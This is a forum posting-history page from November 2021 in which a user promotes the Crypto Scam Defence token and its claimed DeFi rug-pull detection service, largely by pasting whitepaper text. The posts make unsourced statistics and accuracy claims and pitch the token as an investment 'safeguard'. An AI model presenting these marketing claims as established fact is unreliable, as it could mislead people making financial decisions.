Terms such as “blacklist” and “whitelist” were commonly used within cybersecurity and infosec circles to simply designate what person or application can access a system or network (and which ones were denied). Our scoring mechanism once filled with the qualified confirmed result against the detected smart contract scam project will automatically blacklist in our data storage and flag it as a highly risky investment with the option for the contract owner to be whitelisted back once it will pass all stages of the validation process where also the community it is involved.
 On top of this validation process being whitelisted by CryptoScamDefence gives contracts the badge of trust verified by cyptoscamdefence.com and community experts. Our scope of work is not only acting as arbitrage middleware but also based on our team experts together with CSD community voice and certified experts will provide enterprise-level audits to support newly created projects to get popular and trusted by the community and potential investors






More features to come

Crypto Scam Defence business model needs continuous improvement and focus on the community voice. Incremental changes into product feature it’s already on the checklist as continuous upgrades and implementation of any solid new features. Constant feedback from the community is an important aspect of the continuous improvement model. Open communication during every phase of executing an improvement is critical to both the final results of the improvement and to the maintenance and project managing costs. Making continuous improvement part of company culture is an excellent and cost-effective approach to tackling an organization’s most difficult challenges. When supported by improvement technology, results can be achieved quickly and success can be sustained over time.
10  Alternate cryptocurrencies / Altcoin Discussion / Re: Crypto Scam Defence - STOP DEFI SCAMS on: November 23, 2021, 12:27:20 PM
How does the system determine if a project is a scam or not? Even projects that have been audited and have a doxxed team can do scams, so far as I know there are some projects that only check smart contracts which can indicate a rug pul or not.


Token utility use Cases
[/color]


Simplified trading


In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too? DeFi may be difficult, but making money from it doesn’t have to be. By aggregating various technologies we make it possible! Your CSD Token acts as a safeguard for your investments.


Automatic scoring mechanism



The auto-scoring mechanism functionality is developed to analyze the various crypto smart contracts, transactions, holders, wallets, and behavior comparisons to give them a score based on well-defined criteria from blockchain experts. We cannot predict asset values on the market and it’s not in our scope of work but we can give you a score to help you make investment decisions. The experimental proof of concept results showed us a high correlation between the scores of the auto-scoring mechanism and the manual scoring. The second layer of human expert crowdsource will add a more precise score.


Rug pull and scam detection



Based on the blockchain enterprise subscription plans we have access to their professional API endpoints to fetch any smart contract data including pending transactions so we can easily instantly detect any movements of funds. As described in previous chapters, our detection mechanism once detected can send notifications To CSD Token holder when specific events trigger the mechanism.



Smart contracts monitoring

Related to the same mechanism, different techniques can be applied with defined patterns to continuously monitor such data in the blockchain.


Address monitor

The same principle can be applied also on user-defined “watchers” to keep an eye on Wallet addresses added into monitor service as a custom job with custom criteria.


Transactions track down

In our early stage when tests have been made as described in the proof of concept chapter we succeeded with no doubt not only to track down transactions but also we
detected blockchain shifts and came back to the original owner including associating transactions with fraud projects and repetitive transactions with other addresses related to the same practices.




Blockchain shift detection


As described above we are able to track down transactions outside of the blockchain boundaries so we can keep track not only in the current network. Following these criteria, if we identify abnormal activity or we link one address to fraud in one network, we already have a bad score applied to the address in the other end. The chances of not being accurate are pretty low.

Behaviour comparison

Starting from the moment when machine learning is getting outside of the testing lab stage as described in the proof of concept chapter, once into the production environment will add a layer of behavior comparison with past projects using AWS AI scalable instances and save data into our data storage for instant future reports.

User defined instant notifications

At the cost notification service providers, any CSD Token holder can spend part of their CSD into being notified when specific events trigger defined criteria. CSD Tokens spent on special services like this one will be transferred to the team wallet for operational costs and further improvements of cryptoscamdefence.com.

Smart contracts whitelisting/blacklisting

Terms such as “blacklist” and “whitelist” were commonly used within cybersecurity and infosec circles to simply designate what person or application can access a system or network (and which ones were denied). Our scoring mechanism once filled with the qualified confirmed result against the detected smart contract scam project will automatically blacklist in our data storage and flag it as a highly risky investment with the option for the contract owner to be whitelisted back once it will pass all stages of the validation process where also the community it is involved.
 On top of this validation process being whitelisted by CryptoScamDefence gives contracts the badge of trust verified by cyptoscamdefence.com and community experts. Our scope of work is not only acting as arbitrage middleware but also based on our team experts together with CSD community voice and certified experts will provide enterprise-level audits to support newly created projects to get popular and trusted by the community and potential investors






More features to come

Crypto Scam Defence business model needs continuous improvement and focus on the community voice. Incremental changes into product feature it’s already on the checklist as continuous upgrades and implementation of any solid new features. Constant feedback from the community is an important aspect of the continuous improvement model. Open communication during every phase of executing an improvement is critical to both the final results of the improvement and to the maintenance and project managing costs. Making continuous improvement part of company culture is an excellent and cost-effective approach to tackling an organization’s most difficult challenges. When supported by improvement technology, results can be achieved quickly and success can be sustained over time.

11  Alternate cryptocurrencies / Altcoin Discussion / Re: Crypto Scam Defence - STOP DEFI SCAMS on: November 23, 2021, 12:17:38 PM
How does the system determine if a project is a scam or not? Even projects that have been audited and have a doxxed team can do scams, so far as I know there are some projects that only check smart contracts which can indicate a rug pul or not.
Rugpull is most likely to happen into those coins which had been not been locked and thats why you should really be keen on finding these various informations when you do tend to make investment.

Scams are everywhere and most of them cant really be noticed even how experienced or veteran you are yet everything could really be looks real yet scammers are getting smarter as we do go ahead.
As an investor then you should be wise and do your own research and wont really be tending out to make out careless decisions.



In simple terms, CSD token is a blockchain-based asset that people buy for gaining access to cryptoscamdefence.com users dashboard to use features that helps them get 13 Crypto Scam Defence instant reports and analytics for other cryptos. With that said, based on the current stage of development and the roadmap exposed, having CSD on your assets will give you endless access to take the right decisions before investing in any other crypto asset. Consider CSD as your safeguard against any potential fraud model and your buddy “consultant” when investing in any newly crypto.

When analyzing other cryptos the automated scoring mechanism based on well-defined algorithms and machine learning behavior comparison plus instant reports of tracked transactions and the second layer of human experts interactions will serve you a powerful CSD utility described in the Token Utility chapter. Even if the experts' prediction for the CSD is that it will rapidly gain popularity, we prefer to be neutral and focus on our scope to be your best buddy consultant that will assist you each step of the way to DeFi revolution and one step closer to money revolution with minimized risks of being scammed.



In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time.
 This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too?

DeFi may be difficult, but making money from it doesn’t have to be. By aggregating various technologies we make it possible! Your CSD Token acts as a safeguard for your investments.
12  Alternate cryptocurrencies / Altcoin Discussion / Re: Crypto Scam Defence - STOP DEFI SCAMS on: November 23, 2021, 12:14:12 PM
How does the system determine if a project is a scam or not? Even projects that have been audited and have a doxxed team can do scams, so far as I know there are some projects that only check smart contracts which can indicate a rug pul or not.

As mentioned in the introduction part, our business model is focused on helping many people from all over the globe to not be tricked by fraudulent projects that can leave them with permanent material loss. The biggest risk that DeFi investors need to worry about is losing all the money but this isn't the only thing they should be worried about. As described above in the chapter Introducing Crypto Scam Defence Solution to DeFi Scams Problem our focus is to gather 10 Crypto Scam Defence information and use data to develop new algorithms in order to identify fraudulent behaviour models.

Our highly experienced team developers and blockchain experts advisers came with a stack of technologies that can make it possible to instantly analyze and score any active smart contract. At the time of writing this, we gathered enough past data and we started to build models of behaviours.


Technologies & Solution Architecture

What is a Tech Stack?

A tech stack refers to a set of tools, programming languages, and technologies that work together to build digital products or solutions such as Crypto Scam Defence solutions. A tech stack consists of two equally important elements: the frontend (client-side) and backend (server-side). Both work together to create a working tech stack.

Check more information in the following Imgur link -

Project Architecture

Crypto Scam Defence architecture diagram with the interactions between applications, microservices, databases, blockchain data aggregator, machine learning instances, third parties API integrations and web users.


Crypto Scam Components
UI/UX CSD Application Components
Structural Components – client and server sides.
FE Component - client component is a representation of a web application’s
functionality that the end-user interacts with.
BE Component - server component built using PHP with a mix of microservices
or a combination of several programming languages and frameworks, including Java, NodeJS, PHP, and Python.

The server component has many parts: app logic,
data storage, third parties integrations for data aggregation, microservices and machine learning instances. It’s the main control centre of the web application which provides continuous access to data for the FE users and connected endpoints. This is where the data is ingested and routed to the data storage or exposed to FE.




13  Alternate cryptocurrencies / Altcoin Discussion / Re: Crypto Scam Defence - STOP DEFI SCAMS on: November 23, 2021, 12:09:09 PM
Besides just using it for gaining access to the dashboard, how exactly is the token going to help with stopping DeFi scams?

In simple terms, Crypto Scam Defence Token is a blockchain-based asset that people buy in order to meet the requirement of
Our highly motivated professional team found ways that make things work differently. Aggregating various technologies we can scan, compare with past behaviors, track down each transaction made on any network, those based on the following layers:

1. The algorithm based  that's extracting data from various blockchains (ETHScan, BSCscan, TRX, ChainLink, and so on)
I wonder how your algos will work on determining which coin is scam and which one is not. I mean some scenarios where there is an exit scam planned. it's hard to know how it will be pulled off or when it will be abandoned since most scammers are now aware that people know of the old rug pulling and honeypot techniques.
The first platform built to stop DeFi scams (RugPulls, HoneyPots)

Our business model is focused on helping many people around the world not get scammed by fraudulent projects.


Nice concept and I hope it does help people but we have to be real, decentralisation always present opportunities for bad players to negatively impact a community.
The best way to reduce fraudulent projects is to educate every newbies and even some old timers in Crypto the dos and don'ts of investing in Altcoins which I don't think your platform is offering. If you can do that and also keep updating your notes, I think your token will have some value.



Hello there!

Community and contributors

The Crypto Scam Defence solution is taking into consideration the principle of open collaboration for innovation and production. We aim to build a network of contributors with revenues as a double layer of methodology and validation.

Communities power everything that’s why we are open to preparing access to our development environments. Having a contributor SDK package anyone that shares our vision can get on board and develop to provide the best and powerful open solution on the market. A revenue model for crowd contributors and challenging tasks will boost CSD platform to periodically update with improvements.



DeFi rug pulls and exit scams formed 99% of all crypto frauds in 2020. DeFi-related hacks now make up more than 60% of the total hack and theft volume in 2021, a large increase from only 25% in 2020. DeFi is an especially unforgiving space – usually, there aren’t any good ways to recover funds or hold malicious actors accountable. However, if you know what to look for, you may be able to decrease the chances of scammers taking advantage of you.

Based on our blockchain experts advisors, we have gathered enough information to identify and predict such practices. We started by aggregating data providers such as Market Link, Chain Link, Etherscan, BscScan, etc. to have enough information, and based on past projects and their behavior, a set of well-defined algorithms and models will give a score to each newly created crypto. Our highly motivated professional team found ways that make things work differently. Aggregating various technologies we can scan, compare with past behaviours, track down each transaction made on any network. Analyzing the movement of funds we scraped and linked over 2.7 million transactions across different blockchains and we found over 100 000 cases of shifts and come back to the original owner. We collected and analyzed transaction data across eight different blockchains to identify how users interacted and we developed new heuristics and identified various patterns of cross-currency trades.

14  Alternate cryptocurrencies / Altcoin Discussion / Crypto Scam Defence - STOP DEFI SCAMS on: November 22, 2021, 09:39:38 PM
The first platform built to stop DeFi scams (RugPulls, HoneyPots)

Our business model is focused on helping many people around the world not get scammed by fraudulent projects.

For more information, visit the official website at https://www.cryptoscamdefence.com/.
Watch out for CSD News https://t.me/CSD_News


In simple terms, Crypto Scam Defence Token is a blockchain-based asset that people buy in order to meet the requirement of gaining access to CSD Dashboard, which is a feature that will help you get instant reports and analytics for any Defi/Crypto project.

Check more information on the official white paper.

https://www.cryptoscamdefence.com/theme-assets/images/whitepaper.pdf




Our highly motivated professional team found ways that make things work differently. Aggregating various technologies we can scan, compare with past behaviors, track down each transaction made on any network, those based on the following layers:

1. The algorithm based  that's extracting data from various blockchains (ETHScan, BSCscan, TRX, ChainLink, and so on)

2. This layer consists of experts + the community's organic opinion.

3. Machine learning that's taking into consideration various past different stimuli gathered from data sources.






Telegram Regional Groups

🇺🇸 https://t.me/CryptoScamDefenceEN
🇷🇴https://t.me/CryptoScamDefenceRO
🇨🇳https://t.me/CSD_Chinese
🇩🇪https://t.me/CSD_German
🇮🇩https://t.me/CSD_Indonesian
🇻🇳 https://t.me/CSD_Vietnamese
🇪🇸https://t.me/CSD_Spanish
🇮🇹 https://t.me/CSD_Italian
🇵🇭 https://t.me/CSD_Philippines
🇯🇵https://t.me/joinchat/z4nms22SUz0wZmJk - Japanese
🇷🇺https://t.me/CSD_Russian
🇹🇷https://t.me/CSD_Turkish
Pages: [1]
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!